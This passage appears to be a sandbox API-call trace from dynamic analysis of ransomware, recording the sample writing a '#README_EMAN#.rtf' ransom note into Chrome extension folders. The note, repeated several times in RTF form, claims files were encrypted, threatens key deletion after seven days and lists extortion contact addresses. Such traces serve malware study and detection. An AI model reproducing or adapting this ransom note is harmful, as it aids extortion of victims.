r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.383] WriteFile (in: hFile=0x2f0, lpBuffer=0x2468d38*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2468d38*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.384] CloseHandle (hObject=0x2f0) returned 1 [0286.384] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0286.384] GetLastError () returned 0x2 [0286.384] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.385] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.385] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.385] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2468d38, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b 